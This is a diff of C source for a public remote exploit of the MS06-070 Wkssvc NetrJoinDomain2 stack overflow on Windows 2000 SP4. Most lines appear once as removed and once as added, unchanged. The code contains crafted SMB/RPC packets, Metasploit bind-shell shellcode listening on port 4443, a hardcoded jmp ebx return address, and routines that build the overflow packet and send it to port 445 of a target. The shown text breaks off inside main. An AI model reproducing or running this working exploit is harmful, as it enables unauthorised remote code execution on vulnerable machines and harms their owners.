+Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
-correct jmp EBX address and fixed exploit output status.
+correct jmp EBX address and fixed exploit output status.
-
+
-Greetz to InTel
+Greetz to InTel
-
+
-Should work on Windows 2000 Server SP4 (All Languages)
+Should work on Windows 2000 Server SP4 (All Languages)
-
+
-
+
-usage:
+usage:
-ms06070 targetip DomainName
+ms06070 targetip DomainName
-
+
-notice:
+notice:
-Make sure the DomainName is valid and live,more informations see
+Make sure the DomainName is valid and live,more informations see
-http://research.eeye.com/html/advisories/published/AD20061114.html,
+http://research.eeye.com/html/advisories/published/AD20061114.html,
-cocoruder just research the vulnerability and give the exploit for
+cocoruder just research the vulnerability and give the exploit for
-Win2000.
+Win2000.
-****************************************************************************/
+****************************************************************************/
-
+
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-#include <winsock.h>
+#include <winsock.h>
-#include <tchar.h>
+#include <tchar.h>
-#pragma comment(lib, "wsock32.lib")
+#pragma comment(lib, "wsock32.lib")
-
+
-
+
-unsigned char SmbNeg[] =
+unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
+
-
+
-unsigned char Session_Setup_AndX_Request[]=
+unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
+"\x62\x00";
-
+
-
+
-unsigned char TreeConnect_AndX_Request[]=
+unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
+"\x3f\x00";
-
+
-
+
-unsigned char NTCreate_AndX_Request[]=
+unsigned char NTCreate_AndX_Request[]=
-"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
+"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
+"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
-"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
+"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
-"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
+"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
-"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
+"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
-
+
-
+
-unsigned char Rpc_Bind_Wkssvc[]=
+unsigned char Rpc_Bind_Wkssvc[]=
-"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
+"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
-"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
+"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
-"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
+"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
-"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
+"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
-"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
+"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
-"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
+"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
-
+
-
+
-unsigned char Rpc_NetrJoinDomain2_Header[]=
+unsigned char Rpc_NetrJoinDomain2_Header[]=
-"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
+"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
-"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
+"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
-"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
+"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
-"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
+"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
-"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
+"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x16\x00"     //opnum,NetrJoinDomain2
+"\x16\x00"     //opnum,NetrJoinDomain2
-"\x30\x2a\x42\x00"
+"\x30\x2a\x42\x00"
-"\x0e\x00\x00\x00"
+"\x0e\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x0e\x00\x00\x00"
+"\x0e\x00\x00\x00"
-"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
-"\x00\x00"
+"\x00\x00"
-"\x10\x01\x00\x00"
+"\x10\x01\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x10\x01\x00\x00";
+"\x10\x01\x00\x00";
-
+
-
+
-unsigned char Rpc_NetrJoinDomain2_End[]=
+unsigned char Rpc_NetrJoinDomain2_End[]=
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x01\x00\x00\x00";
+"\x01\x00\x00\x00";
-
+
-
+
-unsigned char *lpDomainName=NULL;
+unsigned char *lpDomainName=NULL;
-DWORD   dwDomainNameLen=0;
+DWORD   dwDomainNameLen=0;
-
+
-
+
-
+
-/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
+/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char shellcode[] =
+unsigned char shellcode[] =
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
-"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
+"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
-"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
+"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
-"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
+"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
-"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
+"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
-"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
+"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
-"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
+"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
-"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
+"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
-"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
+"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
-"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
+"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
-"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
+"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
-"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
+"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
-"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
+"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
-"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
+"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
-"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
+"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
-"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
+"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
-"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
+"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
-"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
+"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
-"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
+"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
-"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
+"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
-"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
+"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
-"\xba\xa6\xf5\x31\x39\x59\x23\xce";
+"\xba\xa6\xf5\x31\x39\x59\x23\xce";
-
+
-
+
-DWORD    fill_len_1 =0x84c;     //fill data
+DWORD    fill_len_1 =0x84c;     //fill data
-DWORD    fill_len_2 =0x1000;    //fill rubbish data
+DWORD    fill_len_2 =0x1000;    //fill rubbish data
-DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
+DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
-unsigned char  code_jmp8[]=      //jmp 8
+unsigned char  code_jmp8[]=      //jmp 8
-"\xEB\x06\x90\x90";
+"\xEB\x06\x90\x90";
-
+
-unsigned char  *Rpc_NetrJoinDomain2=NULL;
+unsigned char  *Rpc_NetrJoinDomain2=NULL;
-DWORD    dwRpc_NetrJoinDomain2=0;
+DWORD    dwRpc_NetrJoinDomain2=0;
-
+
-
+
-unsigned char  recvbuff[2048];
+unsigned char  recvbuff[2048];
-
+
-
+
-void showinfo(void)
+void showinfo(void)
-{
+{
- printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
+ printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
- printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
+ printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
- printf("page:http://ruder.cdut.net/default.asp\n\n");
+ printf("page:http://ruder.cdut.net/default.asp\n\n");
- printf("Code fixed by S A Stevens - 16.11.2006\n");
+ printf("Code fixed by S A Stevens - 16.11.2006\n");
- printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
+ printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
- printf("usage:\n");
+ printf("usage:\n");
- printf("ms06070 targetip DomainName\n\n");
+ printf("ms06070 targetip DomainName\n\n");
- printf("notice:\n");
+ printf("notice:\n");
- printf("Make sure the DomainName is valid and live,more informations see\n");
+ printf("Make sure the DomainName is valid and live,more informations see\n");
- printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
+ printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
- printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
+ printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
-
+
-}
+}
-
+
-void neg ( int s )
+void neg ( int s )
-{
+{
- char response[1024];
+ char response[1024];
-
+
- memset(response,0,sizeof(response));
+ memset(response,0,sizeof(response));
-
+
- send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+ send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
+}
-
+
-
+
-
+
-void MakeAttackPacket(char *lpDomainNameStr)
+void MakeAttackPacket(char *lpDomainNameStr)
-{
+{
- DWORD  j,len,b_flag;
+ DWORD  j,len,b_flag;
-
+
-
+
-
+
- dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
+ dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
- lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
+ lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
-
+
- memset(lpDomainName,0,dwDomainNameLen);
+ memset(lpDomainName,0,dwDomainNameLen);
-
+
-MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
+MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
-
+
- *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
- *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
-
+
- len=dwDomainNameLen+     //DomainName
+ len=dwDomainNameLen+     //DomainName
- fill_len_1-3*2+      //fill_len_1
+ fill_len_1-3*2+      //fill_len_1
- 4+         //jmp 8
+ 4+         //jmp 8
- 4+         //addr jmp ebx
+ 4+         //addr jmp ebx
- sizeof(shellcode)-1+    //shellcode
+ sizeof(shellcode)-1+    //shellcode
- fill_len_2+       //fill_len_2
+ fill_len_2+       //fill_len_2
- 2;         //0x0000
+ 2;         //0x0000
-
+
- b_flag=0;
+ b_flag=0;
- if (len%2==1)
+ if (len%2==1)
- {
+ {
- len++;
+ len++;
- b_flag=1;
+ b_flag=1;
- }
+ }
-
+
-
+
- dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
+ dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
-       len+
+       len+
-       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
+       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
-
+
-
+
- //malloc
+ //malloc
- Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
+ Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
- if (Rpc_NetrJoinDomain2==NULL)
+ if (Rpc_NetrJoinDomain2==NULL)
- {
+ {
- printf("malloc error!\n");
+ printf("malloc error!\n");
- return;
+ return;
- }
+ }
-
+
- //fill nop
+ //fill nop
- memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
+ memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
-
+
-
+
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
+
- //update para1 length
+ //update para1 length
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
-
+
-
+
- //copy header
+ //copy header
-
+
-memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
+memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
-
+
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
+
- //copy DomainName
+ //copy DomainName
- memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
+ memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
- j=j+dwDomainNameLen;
+ j=j+dwDomainNameLen;
-
+
- //calculate offset
+ //calculate offset
- j=j+fill_len_1-3*2;
+ j=j+fill_len_1-3*2;
-
+
- //jmp 8
+ //jmp 8
- memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
+ memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
- j=j+4;
+ j=j+4;
-
+
- //jmp ebx address
+ //jmp ebx address
- *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
+ *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
- j=j+4;
+ j=j+4;
-
+
- //copy shellcode
+ //copy shellcode
- memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
+ memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
- j=j+sizeof(shellcode)-1;
+ j=j+sizeof(shellcode)-1;
-
+
- //fill data
+ //fill data
- memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
+ memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
- j=j+fill_len_2;
+ j=j+fill_len_2;
-
+
- //0x0000(NULL)
+ //0x0000(NULL)
- if (b_flag==0)
+ if (b_flag==0)
- {
+ {
- Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
- j=j+2;
+ j=j+2;
- }
+ }
- else if (b_flag==1)
+ else if (b_flag==1)
- {
+ {
- Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
- Rpc_NetrJoinDomain2[j+2]=0x00;
+ Rpc_NetrJoinDomain2[j+2]=0x00;
- j=j+3;
+ j=j+3;
- }
+ }
-
+
-
+
- //copy other parameter
+ //copy other parameter
-
+
-memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
+memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
-
+
- j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
+ j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
-
+
-
+
-}
+}
-
+
-
+
-
+
-void main(int argc,char **argv)
+void main(int argc,char **argv)
-{
+{
- WSADATA    ws;
+ WSADATA    ws;
- struct sockaddr_in server;
+ struct sockaddr_in server;
-   SOCKET    sock;
+   SOCKET    sock;
- DWORD    ret;
+ DWORD    ret;
- WORD    userid,treeid,fid;
+ WORD    userid,treeid,fid;
-
+
-
+
- WSAStartup(MAKEWORD(2,2),&ws);
+ WSAStartup(MAKEWORD(2,2),&ws);
-
+
-
+
-
+
-
+
-   sock = socket(AF_INET,SOCK_STREAM,0);
+   sock = socket(AF_INET,SOCK_STREAM,0);
-   if(sock<=0)
+   if(sock<=0)
- {
+ {
-       return;
+       return;
- }
+ }
-
+
-   server.sin_family = AF_INET;
+   server.sin_family = AF_INET;
-   server.sin_addr.s_addr = inet_addr(argv[1]);
+   server.sin_addr.s_addr = inet_addr(argv[1]);
-   server.sin_port = htons((USHORT)445);
+   server.sin_port = htons((USHORT)445);
-
+
- printf("[+] Connecting %s\n",argv[1]);
+ printf("[+] Connecting %s\n",argv[1]);
-
+
-   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
- if (ret==-1)
+ if (ret==-1)
- {
+ {
- printf("Connection Error, Port 445 Firewalled?\n");
+ printf("Connection Error, Port 445 Firewalled?\n");
- return;
+ return;
- }
+ }
-
+
-
+
- neg(sock);
+ neg(sock);
-
+
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+ ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Session_Setup_AndX_Request error!\n");
+ printf("send Session_Setup_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- userid=*(WORD *)(recvbuff+0x20);       //get userid
+ userid=*(WORD *)(recvbuff+0x20);       //get userid
-
+
-
+
- memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+ memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
+
-
+
- ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+ ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send TreeConnect_AndX_Request error!\n");
+ printf("send TreeConnect_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
+ treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
-
+
-
+
- //send NTCreate_AndX_Request
+ //send NTCreate_AndX_Request
- memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
+ memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
- memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
+ memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
-
+
-
+
- ret=send(sock,(char
+ ret=send(sock,(char
-*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
+*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send NTCreate_AndX_Request error!\n");
+ printf("send NTCreate_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
- fid=*(WORD *)(recvbuff+0x2a);        //get fid
+ fid=*(WORD *)(recvbuff+0x2a);        //get fid
